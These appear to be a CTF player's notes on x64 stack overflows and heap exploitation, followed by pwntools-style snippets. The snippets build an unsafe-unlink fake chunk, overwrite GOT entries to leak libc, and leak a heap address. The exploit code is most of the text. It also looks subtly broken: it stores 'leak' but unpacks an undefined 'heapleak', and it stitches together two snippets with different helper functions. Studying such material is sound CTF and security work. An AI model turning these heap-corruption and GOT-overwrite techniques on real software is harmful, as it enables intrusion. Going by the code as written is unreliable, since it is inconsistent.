Causing SIGSEV for x64: usually happens when program puts long input on stack, which overflows into $rbp. When program tries to return after exiting a function, it returns to 0x4141414141414141 (‘AAAAAAAA’ ), result in crash.
Heap crashes involves: 1. Off-by-one variant, which “SOMETIMES” (also depending on libc version) overwrites the ‘size tracker’ of the next chunk on the heap, as shown in the devel0pment.de blog.
Some solution template to ctf heap exploits, after leaking libc address, then it is possible to ROP to shell. In some ctf, taking over $rip to a function to read flag is the goal, not syscall or system(‘/bin/sh’).
# leaks libc 6
for i in range(5):
create(0x108 , 0x108* 'A')
fake = ''
fake += p64(0) + p64(0x101)
fake += p64(0x6020D8 - 0x18) + p64(0x6020D8 - 0x10)
edit(3, fake + 'F' * 0xE0 + p64(0x100) + p64(0x110)[:2])
delete(4)
edit(3, p64(elf.got['strlen']))
edit(0, p64(elf.sym['puts']))
edit(3, p64(elf.got['setvbuf']))
edit(0, '\n')
# heap leak
for i in range(3):
alloc(0x30, 'A' * 0x20)
for i in range(3):
free(i)
alloc(0, 'a')
show(0)
leak = p.recvline()[:-1]
heap = u64(heapleak.ljust(8, '\x00'))